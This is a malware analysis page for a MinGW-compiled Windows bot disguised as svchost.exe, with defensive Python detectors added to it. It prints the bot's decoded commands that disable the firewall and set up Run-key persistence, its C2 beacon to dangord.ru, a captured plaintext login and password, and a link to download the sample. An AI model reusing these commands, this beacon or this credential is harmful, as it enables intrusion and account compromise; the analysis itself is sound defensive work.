E88817fb6dd1b1340e29b73eed09a106
Description
Properties
- Compiled with MinGW (GCC for Windows): the binary carries the libgcc marker -LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32 and the runtime source path ../../gcc/gcc/config/i386/w32-shared-ptr.c in its assertion strings.
- Not packed, but its configuration (user-agents, registry paths, command templates, OS table) is stored as base64-encoded strings; the standard base64 alphabet is present in the clear, consistent with an embedded decoder routine.
Identification
File Name | svchost.exe |
---|---|
File Size | 73584 bytes |
File Type | PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
MD5 | e88817fb6dd1b1340e29b73eed09a106 |
SHA1 | 285f2aac67b12716502e196345c0f39a970c58db |
SHA256 | 8ea6b5a35918ec19eeb904e42ddcd294ebfe6116b67f5940e25846ffbbd6fb3a |
SHA512 | 1d97636a99d64397ba2fc191e55e413d034ea06291b440d7d8ea043385011f456f3904c558ddc70e9233235758a354a37215755fdced6da16527112087ddaa08 |
CRC32 | 08F89B9E |
Ssdeep | 1536:0ubvVuG2m44f1SZZxGhjhigsWLNdh+K9FZ:txp2m44AZbGhjDn+8FZ |
Antivirus detection
- Detection rate: 18/50 (2014-01-29 09:59:48 UTC)
- Link: https://www.virustotal.com/fr/file/8ea6b5a35918ec19eeb904e42ddcd294ebfe6116b67f5940e25846ffbbd6fb3a/analysis/
Static analysis
Strings
Strings extracted from the binary (base64 blobs shown as found; the decoded form follows below):
YXBvS0FMaXBsaXM9*WVib2toaGh0*@R0*@Rwc@A6O^ovLy8vLy9kZGRhYWFubm5nZ2*vb29ycnJkZGQuLi5ycnJ1*XUvLy93*3*PT09PT09sbGwvLy9tbW1EREQvLy9paWlubm5kZGRlZWV4e@guLi5wc@BoaGhwc@AxMTFkZGRiYmIwMDAxMTE1NTVo YWI1Y2U2M^I4YTExMDRlN2YwOGRmYmI2NDFkYzliM^A= Z^g0ZTI3ZmUyYzk3MDg0NTA5M2YwM^I4Mzh^ZmEwZGM= NzA0ZDQxMzRmYTJ^MDhkMTc4NDFmND*hZmVkN2Y4OTk= ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ MS4xNg== c3ZjaG9zdC5leGU= TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjE= TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ== TW96aWxsYS81LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMjsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKQ== TW96aWxsYS81LjAgKGNvbXBhdGlibGU7IE1TSUUgOS4wOyBXaW5kb3dzIE5UIDYuMjsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKQ== TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MC45LjYpIEdlY2tvLzIwMDExMTI4 TW96aWxsYS80LjAgKE1vYmlsZVBob25lIFNDUC01NTAwL1VTLzEuMCkgTmV0RnJvbnQvMy4wIE1NUC8yLjAgKGNvbXBhdGlibGU7IEdvb2dsZWJvdC8yLjE7IGh0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbCk= TW96aWxsYS80LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyBubDsgcnY6MS45LjIuMykgR2Vja28vMjAxMDA0MDEgRmlyZWZveC8zLjYuMw== TW96aWxsYS80LjAgKFdpbmRvd3MgTlQgNS4xOyBVOyBlbikgUHJlc3RvLzIuNS4yMiBWZXJzaW9uLzEwLjUw TW96aWxsYS80LjAgR2FsZW9uLzEuMi4wIChYMTE7IExpbnV4IGk2ODY7IFU7KSBHZWNrby8yMDAyMDMyNg== T3BlcmEvMTAuODAgKFN1bk9TIDUuOCBzdW40dTsgVSkgT3BlcmEgMTAuOCBbZW5d dWlkPQ== dmVyPQ== bWs9 b3M9 cnM9 Yz0= cnE9 Y21kIC9jIGVjaG8gWXxDQUNMUyAi IiAvUCAi Ok4i Q0FDTFMgIg== OlIiIC9F YWR2YXBpMzI= Q2hlY2tUb2tlbk1lbWJlcnNoaXA= [8] [7] regini U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cRXhwbG9yZXJcU2hlbGwgRm9sZGVycw== AppData cmd /c " Internet Explorer ProgramFilesDir 
SOFTWARE\Microsoft\Windows\CurrentVersion \Internet Explorer\iexplore.exe U29mdHdhcmVcc3c= path R0g1Sy1HS0w4LUNQUDQtREUyNA== urlmon URLDownloadToFileA Content-Type: application/x-www-form-urlencoded HTTP/1.1 POST document.cookie= ["cookie"," "realauth= "location"]; GET / HTTP/1.1 Host: User-Agent: Referer: Cookie: Cache-Control: no-cache Connection: Keep-Alive POST / HTTP/1.1 Accept: */* Content-Length: http:// Y2Zh Y21k ZXhl d3Rm ZGVm ZGQx ZGMx ZHMx ZGQy ZGQz ZGQ0 ZGQ1 ZGQ2 ZGQ3 Qzpc U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25c ProductName V2luZG93cyA3 Win07 V2luZG93cyA4 Win08 V2luZG93cyA4LjE= Win81 VmlzdGE= Win_V WFA= WinXP MjAwMA== S2000 MjAwMw== S2003 MjAwOA== S2008 MjAxMw== S2013 YWRt ag== SA== ZA== U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25ccG9saWNpZXNcRXhwbG9yZXJcUnVu SEtFWV9MT0NBTF9NQUNISU5FXFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXHBvbGljaWVzXEV4cGxvcmVyXFJ1bg== U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu SEtFWV9MT0NBTF9NQUNISU5FXFNvZnR3YXJlXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFJ1bg== SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu x86kernel2 bmV0IHN0b3AgTXBzU3Zj c2MgY29uZmlnIE1wc1N2YyBzdGFydD0gZGlzYWJsZWQ= Oio6RW5hYmxlZDo= U1lTVEVNXENvbnRyb2xTZXQwMDFcc2VydmljZXNcU2hhcmVkQWNjZXNzXFBhcmFtZXRlcnNcRmlyZXdhbGxQb2xpY3lcU3RhbmRhcmRQcm9maWxlXEF1dGhvcml6ZWRBcHBsaWNhdGlvbnNcTGlzdA== U1lTVEVNXENvbnRyb2xTZXQwMDJcc2VydmljZXNcU2hhcmVkQWNjZXNzXFBhcmFtZXRlcnNcRmlyZXdhbGxQb2xpY3lcU3RhbmRhcmRQcm9maWxlXEF1dGhvcml6ZWRBcHBsaWNhdGlvbnNcTGlzdA== U1lTVEVNXENvbnRyb2xTZXQwMDNcc2VydmljZXNcU2hhcmVkQWNjZXNzXFBhcmFtZXRlcnNcRmlyZXdhbGxQb2xpY3lcU3RhbmRhcmRQcm9maWxlXEF1dGhvcml6ZWRBcHBsaWNhdGlvbnNcTGlzdA== U1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXFNoYXJlZEFjY2Vzc1xQYXJhbWV0ZXJzXEZpcmV3YWxsUG9saWN5XFN0YW5kYXJkUHJvZmlsZVxBdXRob3JpemVkQXBwbGljYXRpb25zXExpc3Q= -LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32 w32_sharedptr->size == sizeof(W32_EH_SHARED) %s:%u: failed assertion `%s' 
../../gcc/gcc/config/i386/w32-shared-ptr.c GetAtomNameA (atom, s, sizeof(s)) != 0 AllocateAndInitializeSid GetUserNameA RegCloseKey RegCreateKeyExA RegOpenKeyA RegQueryValueExA RegSetValueExA AddAtomA CloseHandle CopyFileA CreateDirectoryA CreateFileA CreateMutexA CreateProcessA CreateThread DeleteFileA ExitProcess FindAtomA FreeLibrary GetAtomNameA GetFileAttributesA GetLastError GetModuleFileNameA GetProcAddress GetVolumeInformationA LoadLibraryA SetUnhandledExceptionFilter Sleep WaitForSingleObject WinExec WriteFile lstrcatA lstrlenA _itoa _strlwr __getmainargs __p__environ __p__fmode __set_app_type _cexit _iob _onexit _setmode abort atexit atoi exit fflush fprintf free malloc memcpy memset rand signal sprintf strcat strcmp strcpy strlen strncat EnumWindows GetWindowRect GetWindowTextA SetWindowPos HttpOpenRequestA HttpSendRequestA InternetCloseHandle InternetConnectA InternetOpenA InternetOpenUrlA InternetReadFile WSACleanup WSAStartup closesocket connect gethostbyname htons inet_addr inet_ntoa ioctlsocket recv send sendto socket ADVAPI32.DLL KERNEL32.dll msvcrt.dll msvcrt.dll USER32.dll WININET.DLL WSOCK32.DLL
Some of them are base64-encoded. Decoded, they yield the bot's configuration and command templates (four-character base64 groups that are damaged in the dump are shown as …):
- apoKALiplis=
- three hash-like hex strings, partly unrecoverable because their base64 is damaged: ab5ce6…a1104e7f08dfbb641dc9b…, …e27fe2c970845093f0…fa0dc, 704d4134f…08d17841f…fed7f899
- 1.16 (version, sent as ver= in the beacon)
- svchost.exe
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1
- Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01
- Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
- Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128
- Mozilla/4.0 (MobilePhone SCP-5500/US/1.0) NetFront/3.0 MMP/2.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
- Mozilla/4.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
- Mozilla/4.0 (Windows NT 5.1; U; en) Presto/2.5.22 Version/10.50
- Mozilla/4.0 Galeon/1.2.0 (X11; Linux i686; U;) Gecko/20020326
- Opera/10.80 (SunOS 5.8 sun4u; U) Opera 10.8 [en]
- uid= ver= mk= os= rs= c= rq= (beacon query-string fragments)
- cmd /c echo Y|CACLS "   " /P "   :N"   CACLS "   :R" /E (fragments of two cacls command lines; echo Y answers the cacls confirmation prompt)
- advapi32, CheckTokenMembership
- Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- Software\sw
- GH5K-GKL8-CPP4-DE24
- cfa cmd exe wtf def dd1 dc1 ds1 dd2 dd3 dd4 dd5 dd6 dd7
- C:\
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\ (ProductName is read from here)
- Windows 7, Windows 8, Windows 8.1, Vista, XP, 2000, 2003, 2008, 2013 (compared against ProductName; the plaintext tags beside them in the dump, Win07, Win08, Win81, Win_V, WinXP, S2000, S2003, S2008, S2013, are the values reported as os=)
- adm, j, H, d
- SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
- Software\Microsoft\Windows\CurrentVersion\Run
- HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
- HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- net stop MpsSvc
- sc config MpsSvc start= disabled
- :*:Enabled:
- SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
- SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
- SYSTEM\ControlSet003\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
- SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
The two firewall strategies fit the OS table: on XP the bot can add itself to the AuthorizedApplications\List (value format path:*:Enabled:name), while on Vista and later it can stop and disable the Windows Firewall service MpsSvc.
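As an added illustration, not code from the page's author, the following Python triages a strings dump the way the decoded list above was produced: every whitespace-separated token that is syntactically base64 and decodes to printable ASCII is reported, plain words that happen to be valid base64 (Host, path, the alphabet string itself) are rejected by the printable check, and tokens with a few corrupted characters are decoded group by group so the intact parts survive. The sample tokens are copied from the strings list above; the function names are my own.

```python
import base64
import binascii
import re

# A handful of tokens copied from the strings dump above: well-formed base64,
# one blob garbled in the dump, and plain strings that must NOT be mistaken
# for base64 (the alphabet string, 'Host', 'path', API and value names).
STRINGS_DUMP = (
    "c3ZjaG9zdC5leGU= MS4xNg== dWlkPQ== YWRt WFA= Oio6RW5hYmxlZDo= "
    "bmV0IHN0b3AgTXBzU3Zj c2MgY29uZmlnIE1wc1N2YyBzdGFydD0gZGlzYWJsZWQ= "
    "YWI1Y2U2M^I4YTExMDRlN2YwOGRmYmI2NDFkYzliM^A= "
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ "
    "Host path x86kernel2 regini CheckTokenMembership"
)

ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/")
STRICT_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _printable(data: bytes) -> bool:
    return bool(data) and all(0x20 <= b < 0x7F for b in data)


def decode_strict(token: str):
    """Decode a well-formed base64 token; None unless the result is printable ASCII.

    The printable check is what rejects 'Host', 'path' or 'CheckTokenMembership':
    syntactically valid base64 that decodes to binary garbage."""
    if len(token) < 4 or len(token) % 4 or not STRICT_RE.match(token):
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except binascii.Error:
        return None
    return raw.decode("ascii") if _printable(raw) else None


def decode_damaged(token: str) -> str:
    """Best-effort decode of a token with a few corrupted characters.

    Each 4-character base64 group maps to 3 bytes independently, so the groups
    that survived still decode; a corrupted group is rendered as '???' (always
    three placeholders, even for a padded trailing group that held fewer bytes)."""
    pieces = []
    for i in range(0, len(token), 4):
        quad = token[i:i + 4]
        try:
            raw = base64.b64decode(quad, validate=True)
            pieces.append(raw.decode("ascii") if _printable(raw) else "?" * len(raw))
        except binascii.Error:
            pieces.append("???")
    return "".join(pieces)


def _looks_damaged(token: str) -> bool:
    # Right length, mostly alphabet, but at least one foreign character.
    bad = sum(1 for c in token.rstrip("=") if c not in ALPHABET)
    return len(token) >= 8 and len(token) % 4 == 0 and 0 < bad <= len(token) // 8


def triage_strings(dump: str):
    """Split a strings dump on whitespace and sort tokens into decoded / damaged / plain."""
    decoded, damaged, plain = {}, {}, []
    for token in dump.split():
        text = decode_strict(token)
        if text is not None:
            decoded[token] = text
        elif _looks_damaged(token):
            damaged[token] = decode_damaged(token)
        else:
            plain.append(token)
    return decoded, damaged, plain


if __name__ == "__main__":
    dec, dam, plain = triage_strings(STRINGS_DUMP)
    for tok, text in dec.items():
        print(f"{tok:48} -> {text!r}")
    for tok, text in dam.items():
        print(f"{tok:48} ~> {text!r}  (damaged)")
    print("plain:", plain)
```

Run against a real strings output, the damaged-group decoder is what recovers the readable parts of the three hash-like blobs listed above; the alphabet string stays in the plain bucket, which is itself a useful indicator that the sample carries its own base64 routine.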
Imports
- ADVAPI32.DLL
- AllocateAndInitializeSid
- GetUserNameA
- RegCloseKey
- RegCreateKeyExA
- RegOpenKeyA
- RegQueryValueExA
- RegSetValueExA
- KERNEL32.dll
- AddAtomA
- CloseHandle
- CopyFileA
- CreateDirectoryA
- CreateFileA
- CreateMutexA
- CreateProcessA
- CreateThread
- DeleteFileA
- ExitProcess
- FindAtomA
- FreeLibrary
- GetAtomNameA
- GetFileAttributesA
- GetLastError
- GetModuleFileNameA
- GetProcAddress
- GetVolumeInformationA
- LoadLibraryA
- SetUnhandledExceptionFilter
- Sleep
- WaitForSingleObject
- WinExec
- WriteFile
- lstrcatA
- lstrlenA
- msvcrt.dll
- _itoa
- _strlwr
- msvcrt.dll
- __getmainargs
- __p__environ
- __p__fmode
- __set_app_type
- _cexit
- _iob
- _onexit
- _setmode
- abort
- atexit
- atoi
- exit
- fflush
- fprintf
- free
- malloc
- memcpy
- memset
- rand
- signal
- sprintf
- strcat
- strcmp
- strcpy
- strlen
- strncat
- USER32.dll
- EnumWindows
- GetWindowRect
- GetWindowTextA
- SetWindowPos
- WININET.DLL
- HttpOpenRequestA
- HttpSendRequestA
- InternetCloseHandle
- InternetConnectA
- InternetOpenA
- InternetOpenUrlA
- InternetReadFile
- WSOCK32.DLL
- WSACleanup
- WSAStartup
- closesocket
- connect
- gethostbyname
- htons
- inet_addr
- inet_ntoa
- ioctlsocket
- recv
- send
- sendto
- socket
Dynamic analysis
Network indicators
Contacted domains
- dangord.ru (81.177.139.243)
- study.mesi.ru (194.85.204.230)
Requests
The first request is the bot's check-in to dangord.ru. Every query parameter corresponds to one of the decoded fragments uid=, ver=, mk=, os=, rs=, c=, rq=: ver=1.16 is the embedded version string, os=WinXP is a tag from the OS table (Win07, Win08, Win81, Win_V, WinXP, S2000, S2003, S2008, S2013, chosen by comparing the ProductName registry value), and rs=adm most likely reports the outcome of the CheckTokenMembership admin check (adm sits next to advapi32 and CheckTokenMembership in the dump). What feeds uid and mk is not established by the strings alone; GetVolumeInformationA is imported, so a volume serial number is a plausible input. The User-Agent is one of the ten hard-coded ones.
GET /wOOl/mD/index.php?uid=01591718&ver=1.16&mk=1db015&os=WinXP&rs=adm&c=1&rq=0 HTTP/1.1
Host: dangord.ru
User-Agent: Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01
Cache-Control: no-cache
Connection: Keep-Alive
The second request, sent with another of the embedded User-Agents, posts a login form to study.mesi.ru; the Cookie header carries a GUID-like value. What the bot does with this host is not established by this analysis.
POST /gst/default.aspx HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: study.mesi.ru
Content-Length: 44
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: {8279c7f1-b2ed-458e-805e-88494272c901}
Cache-Control: no-cache
Connection: Keep-Alive

login=studmskk_12_dsmihalin&password=u4jeD17
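Added example, not from the original page: a small Python detector that scores proxy-log requests against the beacon shape above, i.e. the exact query-key set uid/ver/mk/os/rs/c/rq on an index.php path, an os= value from the embedded OS tag table, rs=adm, and a User-Agent from the embedded list. The log lines are constructed (the first one reproduces the captured beacon); only two of the ten User-Agents are listed, and the tab-separated field layout and the alert threshold are my assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Query keys the bot builds from its decoded 'uid= ver= mk= os= rs= c= rq=' fragments.
BEACON_KEYS = {"uid", "ver", "mk", "os", "rs", "c", "rq"}
# OS tags from the decoded string table (Windows 7 -> Win07 ... 2013 -> S2013).
OS_TAGS = {"Win07", "Win08", "Win81", "Win_V", "WinXP", "S2000", "S2003", "S2008", "S2013"}
# Two of the ten hard-coded User-Agents; a production rule would carry all ten.
EMBEDDED_UAS = {
    "Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01",
    "Opera/10.80 (SunOS 5.8 sun4u; U) Opera 10.8 [en]",
}
ALERT_THRESHOLD = 2  # assumption: one weak indicator alone is not enough

# Constructed proxy log (tab separated: time, client, method, URL, User-Agent).
# Line 1 is the beacon captured above; lines 2 and 3 are benign look-alikes.
SAMPLE_LOG = """\
2014-01-29T10:00:01Z\t10.0.0.5\tGET\thttp://dangord.ru/wOOl/mD/index.php?uid=01591718&ver=1.16&mk=1db015&os=WinXP&rs=adm&c=1&rq=0\tMozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01
2014-01-29T10:00:02Z\t10.0.0.6\tGET\thttp://example.com/index.php?uid=42&ver=1.0\tMozilla/5.0 (Windows NT 6.1) Firefox/26.0
2014-01-29T10:00:03Z\t10.0.0.7\tGET\thttp://example.net/news.php?id=3\tOpera/10.80 (SunOS 5.8 sun4u; U) Opera 10.8 [en]
"""


def score_request(url: str, user_agent: str) -> list:
    """Return the beacon indicators matched by one request (empty list = nothing matched)."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    # The strongest signal is the exact key set: a benign site rarely uses all seven.
    if set(params) == BEACON_KEYS and parts.path.endswith("index.php"):
        hits.append("exact beacon key set")
        if params["os"][0] in OS_TAGS:
            hits.append("os tag from embedded table")
        if params["rs"][0] == "adm":
            hits.append("rs=adm admin flag")
    # A rare 2001-era User-Agent is suspicious on its own, but only weakly.
    if user_agent in EMBEDDED_UAS:
        hits.append("hard-coded User-Agent")
    return hits


def scan_log(text: str) -> list:
    """Return (client, destination host, indicators) for every line over the threshold."""
    alerts = []
    for line in text.splitlines():
        _ts, client, _method, url, ua = line.split("\t")
        hits = score_request(url, ua)
        if len(hits) >= ALERT_THRESHOLD:
            alerts.append((client, urlsplit(url).hostname, hits))
    return alerts


if __name__ == "__main__":
    for client, host, hits in scan_log(SAMPLE_LOG):
        print(f"{client} -> {host}: {', '.join(hits)}")
```

Keying on the parameter set rather than the domain is deliberate: dangord.ru is a single C2 that can change, while the query layout is compiled into the binary.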
Process activity
Sandbox process list; the parent/child indentation did not survive extraction. The cmd.exe/cacls.exe pairs correspond to the decoded CACLS templates (in cacls syntax, /P user:N replaces that user's rights with none, :R grants read-only and /E edits the ACL instead of replacing it; the target paths are not recorded on this page). The regini.exe runs go with the regini, [7] and [8] strings, [n] being the ACL code syntax of a regini script. The second svchost.exe is presumably the copy dropped under %APPDATA% that the Run value below points to (CopyFileA is imported).
- svchost.exe
- cmd.exe
- cmd.exe
- cacls.exe
- CACLS.exe
- cmd.exe
- cmd.exe
- cacls.exe
- CACLS.exe
- svchost.exe
- regini.exe
- regini.exe
- regini.exe
- regini.exe
- cmd.exe
Registry keys
The malware creates a persistence value in the machine-wide Run key, pointing at the copy of itself under %APPDATA% (the user name and the directory name 03926344 are as recorded by the sandbox):
- Key: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
- Name: "x86kernel2"
- Type: REG_SZ
- Value: c:\users\username\appdata\roaming\03926344\svchost.exe
The value name x86kernel2 is present in the clear in the strings. The decoded strings also carry the HKCU Run and policies\Explorer\Run paths, presumably used when the bot does not hold administrative rights (compare rs=adm in the beacon), and the XP firewall AuthorizedApplications\List keys together with the :*:Enabled: suffix, i.e. a firewall exception for the dropped file; only the Run value is recorded here.
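Added example, not part of the original analysis: a Python triage over registry data (constructed here as (key, name, data) rows, as reg query would print them) that applies the indicators from this page: a Run value named x86kernel2 or pointing at an svchost.exe outside System32, and an XP firewall AuthorizedApplications\List entry of the form path:*:Enabled:name for a binary in a user-writable directory. The first row is the persistence value recorded above; the benign rows are invented for contrast.

```python
import ntpath

# Run keys named in the decoded strings (lower-cased for comparison).
RUN_KEYS = {
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\policies\explorer\run",
}
# Suffix shared by the ControlSet001/002/003 and CurrentControlSet variants.
FIREWALL_LIST_SUFFIX = r"\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list"
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")

# Constructed registry export: (key, value name, data).  Row 1 is the value
# recorded on this page; rows 2 and 4 are benign decoys; row 3 is the firewall
# exception the decoded strings would produce for the dropped file.
SAMPLE_REGISTRY = [
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "x86kernel2",
     r"c:\users\username\appdata\roaming\03926344\svchost.exe"),
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\System32\SecurityHealthSystray.exe"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List",
     r"C:\Users\username\AppData\Roaming\03926344\svchost.exe",
     r"C:\Users\username\AppData\Roaming\03926344\svchost.exe:*:Enabled:svchost"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List",
     r"C:\Program Files\Internet Explorer\iexplore.exe",
     r"C:\Program Files\Internet Explorer\iexplore.exe:*:Enabled:Internet Explorer"),
]


def _norm(path: str) -> str:
    return path.strip('"').lower()


def in_system_dir(path: str) -> bool:
    p = _norm(path)
    return any(p.startswith(d + "\\") for d in SYSTEM_DIRS)


def in_user_writable_dir(path: str) -> bool:
    p = _norm(path)
    return any(marker in p for marker in USER_WRITABLE)


def check_run_value(name: str, data: str) -> list:
    findings = []
    if ntpath.basename(_norm(data)) == "svchost.exe" and not in_system_dir(data):
        findings.append("Run value points at svchost.exe outside System32: " + data)
    if name.lower() == "x86kernel2":
        findings.append("Run value name x86kernel2 (IoC for this sample)")
    return findings


def parse_firewall_entry(data: str):
    """Split an XP-style 'path:*:Enabled:name' value into (path, state, name).

    Splitting on ':*:' rather than ':' keeps the drive letter's colon inside the path."""
    path, _, rest = data.partition(":*:")
    state, _, name = rest.partition(":")
    return path, state, name


def check_firewall_entry(data: str) -> list:
    path, state, _name = parse_firewall_entry(data)
    if state.lower() != "enabled":
        return []
    suspicious = in_user_writable_dir(path) or (
        ntpath.basename(_norm(path)) == "svchost.exe" and not in_system_dir(path)
    )
    return ["firewall exception for non-system binary: " + path] if suspicious else []


def triage_registry(rows) -> list:
    findings = []
    for key, name, data in rows:
        k = key.lower()
        if k in RUN_KEYS:
            findings.extend(check_run_value(name, data))
        elif k.endswith(FIREWALL_LIST_SUFFIX):
            findings.extend(check_firewall_entry(data))
    return findings


if __name__ == "__main__":
    for finding in triage_registry(SAMPLE_REGISTRY):
        print(finding)
```

On a live host the same checks can be fed from reg query output or a forensic hive parser; the svchost.exe-outside-System32 rule is the durable one, since the value name and the numeric directory are sample-specific.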
Links
Download sample | https://www.dropbox.com/s/0do9lgywcz63d4d/e88817fb6dd1b1340e29b73eed09a106.zip (pass: infected) |
---|---|
Virustotal | https://www.virustotal.com/fr/file/8ea6b5a35918ec19eeb904e42ddcd294ebfe6116b67f5940e25846ffbbd6fb3a/analysis/ |
Malwr sandbox analysis | https://malwr.com/analysis/MTY2MGQzMTI3ZjhhNGJlZmJiZDc4N2FlZWUwMmY1OTc/ |